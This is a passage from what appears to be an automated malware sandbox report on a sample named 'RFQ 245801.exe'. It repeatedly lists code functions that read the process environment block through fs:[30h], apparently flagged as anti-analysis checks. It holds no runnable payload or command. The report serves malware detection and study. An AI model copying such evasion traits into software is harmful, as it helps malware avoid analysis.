          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A63C0 mov eax, dword ptr fs:[00000030h]5_2_017A63C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01718397 mov eax, dword ptr fs:[00000030h]5_2_01718397
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01718397 mov eax, dword ptr fs:[00000030h]5_2_01718397
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01718397 mov eax, dword ptr fs:[00000030h]5_2_01718397
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171E388 mov eax, dword ptr fs:[00000030h]5_2_0171E388
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171E388 mov eax, dword ptr fs:[00000030h]5_2_0171E388
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171E388 mov eax, dword ptr fs:[00000030h]5_2_0171E388
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174438F mov eax, dword ptr fs:[00000030h]5_2_0174438F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174438F mov eax, dword ptr fs:[00000030h]5_2_0174438F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D0274 mov eax, dword ptr fs:[00000030h]5_2_017D0274
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01724260 mov eax, dword ptr fs:[00000030h]5_2_01724260
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01724260 mov eax, dword ptr fs:[00000030h]5_2_01724260
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01724260 mov eax, dword ptr fs:[00000030h]5_2_01724260
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171826B mov eax, dword ptr fs:[00000030h]5_2_0171826B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171A250 mov eax, dword ptr fs:[00000030h]5_2_0171A250
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F625D mov eax, dword ptr fs:[00000030h]5_2_017F625D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726259 mov eax, dword ptr fs:[00000030h]5_2_01726259
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017DA250 mov eax, dword ptr fs:[00000030h]5_2_017DA250
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017DA250 mov eax, dword ptr fs:[00000030h]5_2_017DA250
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A8243 mov eax, dword ptr fs:[00000030h]5_2_017A8243
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A8243 mov ecx, dword ptr fs:[00000030h]5_2_017A8243
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171823B mov eax, dword ptr fs:[00000030h]5_2_0171823B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017302E1 mov eax, dword ptr fs:[00000030h]5_2_017302E1
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017302E1 mov eax, dword ptr fs:[00000030h]5_2_017302E1
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017302E1 mov eax, dword ptr fs:[00000030h]5_2_017302E1
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F62D6 mov eax, dword ptr fs:[00000030h]5_2_017F62D6
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A2C3 mov eax, dword ptr fs:[00000030h]5_2_0172A2C3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A2C3 mov eax, dword ptr fs:[00000030h]5_2_0172A2C3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A2C3 mov eax, dword ptr fs:[00000030h]5_2_0172A2C3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A2C3 mov eax, dword ptr fs:[00000030h]5_2_0172A2C3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A2C3 mov eax, dword ptr fs:[00000030h]5_2_0172A2C3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017302A0 mov eax, dword ptr fs:[00000030h]5_2_017302A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017302A0 mov eax, dword ptr fs:[00000030h]5_2_017302A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B62A0 mov eax, dword ptr fs:[00000030h]5_2_017B62A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B62A0 mov ecx, dword ptr fs:[00000030h]5_2_017B62A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B62A0 mov eax, dword ptr fs:[00000030h]5_2_017B62A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B62A0 mov eax, dword ptr fs:[00000030h]5_2_017B62A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B62A0 mov eax, dword ptr fs:[00000030h]5_2_017B62A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B62A0 mov eax, dword ptr fs:[00000030h]5_2_017B62A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E284 mov eax, dword ptr fs:[00000030h]5_2_0175E284
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E284 mov eax, dword ptr fs:[00000030h]5_2_0175E284
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A0283 mov eax, dword ptr fs:[00000030h]5_2_017A0283
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A0283 mov eax, dword ptr fs:[00000030h]5_2_017A0283
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A0283 mov eax, dword ptr fs:[00000030h]5_2_017A0283
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175656A mov eax, dword ptr fs:[00000030h]5_2_0175656A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175656A mov eax, dword ptr fs:[00000030h]5_2_0175656A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175656A mov eax, dword ptr fs:[00000030h]5_2_0175656A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728550 mov eax, dword ptr fs:[00000030h]5_2_01728550
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728550 mov eax, dword ptr fs:[00000030h]5_2_01728550
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730535 mov eax, dword ptr fs:[00000030h]5_2_01730535
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730535 mov eax, dword ptr fs:[00000030h]5_2_01730535
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730535 mov eax, dword ptr fs:[00000030h]5_2_01730535
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730535 mov eax, dword ptr fs:[00000030h]5_2_01730535
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730535 mov eax, dword ptr fs:[00000030h]5_2_01730535
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730535 mov eax, dword ptr fs:[00000030h]5_2_01730535
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E53E mov eax, dword ptr fs:[00000030h]5_2_0174E53E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E53E mov eax, dword ptr fs:[00000030h]5_2_0174E53E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E53E mov eax, dword ptr fs:[00000030h]5_2_0174E53E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E53E mov eax, dword ptr fs:[00000030h]5_2_0174E53E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E53E mov eax, dword ptr fs:[00000030h]5_2_0174E53E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B6500 mov eax, dword ptr fs:[00000030h]5_2_017B6500
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4500 mov eax, dword ptr fs:[00000030h]5_2_017F4500
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4500 mov eax, dword ptr fs:[00000030h]5_2_017F4500
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4500 mov eax, dword ptr fs:[00000030h]5_2_017F4500
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4500 mov eax, dword ptr fs:[00000030h]5_2_017F4500
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4500 mov eax, dword ptr fs:[00000030h]5_2_017F4500
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4500 mov eax, dword ptr fs:[00000030h]5_2_017F4500
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4500 mov eax, dword ptr fs:[00000030h]5_2_017F4500
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017225E0 mov eax, dword ptr fs:[00000030h]5_2_017225E0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E5E7 mov eax, dword ptr fs:[00000030h]5_2_0174E5E7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E5E7 mov eax, dword ptr fs:[00000030h]5_2_0174E5E7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E5E7 mov eax, dword ptr fs:[00000030h]5_2_0174E5E7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E5E7 mov eax, dword ptr fs:[00000030h]5_2_0174E5E7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E5E7 mov eax, dword ptr fs:[00000030h]5_2_0174E5E7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E5E7 mov eax, dword ptr fs:[00000030h]5_2_0174E5E7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E5E7 mov eax, dword ptr fs:[00000030h]5_2_0174E5E7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E5E7 mov eax, dword ptr fs:[00000030h]5_2_0174E5E7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175C5ED mov eax, dword ptr fs:[00000030h]5_2_0175C5ED
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175C5ED mov eax, dword ptr fs:[00000030h]5_2_0175C5ED
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017265D0 mov eax, dword ptr fs:[00000030h]5_2_017265D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175A5D0 mov eax, dword ptr fs:[00000030h]5_2_0175A5D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175A5D0 mov eax, dword ptr fs:[00000030h]5_2_0175A5D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E5CF mov eax, dword ptr fs:[00000030h]5_2_0175E5CF
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E5CF mov eax, dword ptr fs:[00000030h]5_2_0175E5CF
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017445B1 mov eax, dword ptr fs:[00000030h]5_2_017445B1
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017445B1 mov eax, dword ptr fs:[00000030h]5_2_017445B1
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A05A7 mov eax, dword ptr fs:[00000030h]5_2_017A05A7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A05A7 mov eax, dword ptr fs:[00000030h]5_2_017A05A7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A05A7 mov eax, dword ptr fs:[00000030h]5_2_017A05A7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E59C mov eax, dword ptr fs:[00000030h]5_2_0175E59C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01722582 mov eax, dword ptr fs:[00000030h]5_2_01722582
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01722582 mov ecx, dword ptr fs:[00000030h]5_2_01722582
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01754588 mov eax, dword ptr fs:[00000030h]5_2_01754588
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174A470 mov eax, dword ptr fs:[00000030h]5_2_0174A470
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174A470 mov eax, dword ptr fs:[00000030h]5_2_0174A470
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174A470 mov eax, dword ptr fs:[00000030h]5_2_0174A470
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AC460 mov ecx, dword ptr fs:[00000030h]5_2_017AC460
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017DA456 mov eax, dword ptr fs:[00000030h]5_2_017DA456
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171645D mov eax, dword ptr fs:[00000030h]5_2_0171645D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174245A mov eax, dword ptr fs:[00000030h]5_2_0174245A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E443 mov eax, dword ptr fs:[00000030h]5_2_0175E443
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E443 mov eax, dword ptr fs:[00000030h]5_2_0175E443
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E443 mov eax, dword ptr fs:[00000030h]5_2_0175E443
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E443 mov eax, dword ptr fs:[00000030h]5_2_0175E443
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E443 mov eax, dword ptr fs:[00000030h]5_2_0175E443
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E443 mov eax, dword ptr fs:[00000030h]5_2_0175E443
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E443 mov eax, dword ptr fs:[00000030h]5_2_0175E443
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175E443 mov eax, dword ptr fs:[00000030h]5_2_0175E443
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171E420 mov eax, dword ptr fs:[00000030h]5_2_0171E420
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171E420 mov eax, dword ptr fs:[00000030h]5_2_0171E420
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171E420 mov eax, dword ptr fs:[00000030h]5_2_0171E420
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171C427 mov eax, dword ptr fs:[00000030h]5_2_0171C427
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A6420 mov eax, dword ptr fs:[00000030h]5_2_017A6420
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A6420 mov eax, dword ptr fs:[00000030h]5_2_017A6420
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A6420 mov eax, dword ptr fs:[00000030h]5_2_017A6420
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A6420 mov eax, dword ptr fs:[00000030h]5_2_017A6420
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A6420 mov eax, dword ptr fs:[00000030h]5_2_017A6420
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A6420 mov eax, dword ptr fs:[00000030h]5_2_017A6420
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A6420 mov eax, dword ptr fs:[00000030h]5_2_017A6420
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01758402 mov eax, dword ptr fs:[00000030h]5_2_01758402
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01758402 mov eax, dword ptr fs:[00000030h]5_2_01758402
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01758402 mov eax, dword ptr fs:[00000030h]5_2_01758402
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017204E5 mov ecx, dword ptr fs:[00000030h]5_2_017204E5
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017544B0 mov ecx, dword ptr fs:[00000030h]5_2_017544B0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AA4B0 mov eax, dword ptr fs:[00000030h]5_2_017AA4B0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017264AB mov eax, dword ptr fs:[00000030h]5_2_017264AB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017DA49A mov eax, dword ptr fs:[00000030h]5_2_017DA49A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728770 mov eax, dword ptr fs:[00000030h]5_2_01728770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730770 mov eax, dword ptr fs:[00000030h]5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730770 mov eax, dword ptr fs:[00000030h]5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730770 mov eax, dword ptr fs:[00000030h]5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730770 mov eax, dword ptr fs:[00000030h]5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730770 mov eax, dword ptr fs:[00000030h]5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730770 mov eax, dword ptr fs:[00000030h]5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730770 mov eax, dword ptr fs:[00000030h]5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730770 mov eax, dword ptr fs:[00000030h]5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730770 mov eax, dword ptr fs:[00000030h]5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730770 mov eax, dword ptr fs:[00000030h]5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730770 mov eax, dword ptr fs:[00000030h]5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730770 mov eax, dword ptr fs:[00000030h]5_2_01730770
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720750 mov eax, dword ptr fs:[00000030h]5_2_01720750
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762750 mov eax, dword ptr fs:[00000030h]5_2_01762750
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762750 mov eax, dword ptr fs:[00000030h]5_2_01762750
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AE75D mov eax, dword ptr fs:[00000030h]5_2_017AE75D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A4755 mov eax, dword ptr fs:[00000030h]5_2_017A4755
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175674D mov esi, dword ptr fs:[00000030h]5_2_0175674D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175674D mov eax, dword ptr fs:[00000030h]5_2_0175674D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175674D mov eax, dword ptr fs:[00000030h]5_2_0175674D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175273C mov eax, dword ptr fs:[00000030h]5_2_0175273C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175273C mov ecx, dword ptr fs:[00000030h]5_2_0175273C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175273C mov eax, dword ptr fs:[00000030h]5_2_0175273C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179C730 mov eax, dword ptr fs:[00000030h]5_2_0179C730
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175C720 mov eax, dword ptr fs:[00000030h]5_2_0175C720
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175C720 mov eax, dword ptr fs:[00000030h]5_2_0175C720
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720710 mov eax, dword ptr fs:[00000030h]5_2_01720710
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01750710 mov eax, dword ptr fs:[00000030h]5_2_01750710
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175C700 mov eax, dword ptr fs:[00000030h]5_2_0175C700
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017247FB mov eax, dword ptr fs:[00000030h]5_2_017247FB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017247FB mov eax, dword ptr fs:[00000030h]5_2_017247FB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017427ED mov eax, dword ptr fs:[00000030h]5_2_017427ED
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017427ED mov eax, dword ptr fs:[00000030h]5_2_017427ED
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017427ED mov eax, dword ptr fs:[00000030h]5_2_017427ED
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AE7E1 mov eax, dword ptr fs:[00000030h]5_2_017AE7E1
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172C7C0 mov eax, dword ptr fs:[00000030h]5_2_0172C7C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A07C3 mov eax, dword ptr fs:[00000030h]5_2_017A07C3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017207AF mov eax, dword ptr fs:[00000030h]5_2_017207AF
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D47A0 mov eax, dword ptr fs:[00000030h]5_2_017D47A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C678E mov eax, dword ptr fs:[00000030h]5_2_017C678E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01752674 mov eax, dword ptr fs:[00000030h]5_2_01752674
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E866E mov eax, dword ptr fs:[00000030h]5_2_017E866E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E866E mov eax, dword ptr fs:[00000030h]5_2_017E866E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175A660 mov eax, dword ptr fs:[00000030h]5_2_0175A660
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175A660 mov eax, dword ptr fs:[00000030h]5_2_0175A660
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173C640 mov eax, dword ptr fs:[00000030h]5_2_0173C640
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173E627 mov eax, dword ptr fs:[00000030h]5_2_0173E627
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01756620 mov eax, dword ptr fs:[00000030h]5_2_01756620
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01758620 mov eax, dword ptr fs:[00000030h]5_2_01758620
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172262C mov eax, dword ptr fs:[00000030h]5_2_0172262C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01762619 mov eax, dword ptr fs:[00000030h]5_2_01762619
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E609 mov eax, dword ptr fs:[00000030h]5_2_0179E609
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0173260B mov eax, dword ptr fs:[00000030h]5_2_0173260B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E6F2 mov eax, dword ptr fs:[00000030h]5_2_0179E6F2
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E6F2 mov eax, dword ptr fs:[00000030h]5_2_0179E6F2
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E6F2 mov eax, dword ptr fs:[00000030h]5_2_0179E6F2
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E6F2 mov eax, dword ptr fs:[00000030h]5_2_0179E6F2
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A06F1 mov eax, dword ptr fs:[00000030h]5_2_017A06F1
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A06F1 mov eax, dword ptr fs:[00000030h]5_2_017A06F1
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175A6C7 mov ebx, dword ptr fs:[00000030h]5_2_0175A6C7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175A6C7 mov eax, dword ptr fs:[00000030h]5_2_0175A6C7
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017566B0 mov eax, dword ptr fs:[00000030h]5_2_017566B0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175C6A6 mov eax, dword ptr fs:[00000030h]5_2_0175C6A6
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01724690 mov eax, dword ptr fs:[00000030h]5_2_01724690
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01724690 mov eax, dword ptr fs:[00000030h]5_2_01724690
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C4978 mov eax, dword ptr fs:[00000030h]5_2_017C4978
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C4978 mov eax, dword ptr fs:[00000030h]5_2_017C4978
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AC97C mov eax, dword ptr fs:[00000030h]5_2_017AC97C
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01746962 mov eax, dword ptr fs:[00000030h]5_2_01746962
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01746962 mov eax, dword ptr fs:[00000030h]5_2_01746962
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01746962 mov eax, dword ptr fs:[00000030h]5_2_01746962
